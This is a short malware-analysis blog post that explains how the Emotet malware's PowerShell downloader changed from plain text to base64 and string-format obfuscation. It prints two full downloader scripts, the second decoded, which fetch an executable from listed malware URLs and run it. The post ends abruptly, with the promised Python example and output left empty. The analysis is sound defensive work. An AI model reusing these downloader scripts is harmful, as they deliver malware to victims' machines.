Decoding the latest Emotet Powershell

As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before, an emial phish with a link, the link downloads a malicious document. The document, usually a malicious word document, uses VBA to build and execute a powershell command which then will download the next stage of infection.

This used to be very simple to see, for example, older observed variants produced the following powershell:

powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}} 

However, a newer variant now encodes the powershell with Base64, then uses some simple obfuscation techniques to make identification of the stage 2 links more difficult for an analyst.

For example:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JAB7A......................B9AH0ADQAKAA=="


decodes

echo "JAB7A......................B9AH0ADQAKAA==" | base64 -d ${wscr`I`pT} = .("{1}{0}{2}"-f 'w-','ne','object') -ComObject ("{2}{1}{0}{3}" -f 'he','ript.S','WSc','ll');${W`eb`ClIEnT} = &("{2}{1}{0}" -f 'bject','-o','new') ("{4}{0}{1}{3}{2}" -f 'W','ebCl','t','ien','System.Net.');${Ra`NDOm} = .("{1}{2}{0}" -f'w-object','n','e') ("{0}{1}" -f'r','andom');${U`RlS} = ("{4}{21}{8}{22}{14}{20}{17}{1}{5}{6}{9}{7}{15}{11}{13}{19}{10}{16}{18}{12}{3}{0}{23}{2}{24}" -f'subs','p:/','ibe/N','m/','http://bellittise','/dbflett.com/Yq','sSad/,http','//arma','rature.it/in',':','/stor','cl/R','co','fWMwd/,http:','de','dores.','e503','C/,http://bringit.pt/Hv/,htt','.','/','/','r','clu','cr','qWPC/').("{1}{0}" -f'plit','S').Invoke(',');${na`me} = ${R`AN`DOM}.("{1}{0}" -f 't','nex').Invoke(1, 65536);${Pa`Th} = ${eNV`:`Temp} + '\' + ${n`AMe} + ("{0}{1}"-f'.e','xe');foreach(${U`Rl} in ${u`Rls}){try{${We`B`CLiE`NT}.("{3}{0}{1}{2}" -f'wnlo','adF','ile','Do').Invoke(${U`Rl}.("{1}{0}{2}" -f 'in','ToStr','g').Invoke(), ${pa`Th});.("{0}{3}{4}{2}{1}" -f'Sta','ess','oc','r','t-Pr') ${P`Ath};break;}catch{&("{2}{0}{1}"-f 'ite-h','ost','wr') ${_}."e`x`cEPt`ioN"."meS`sA`gE";}} 

So, you could manually work through the transpositions here, however a nice technique was shown at Myonlinesecurity
If you don't have immediate access to powershell, you could also manually copy the same relevant pieces into a quick python script.
Here is an example:



The output:

Comments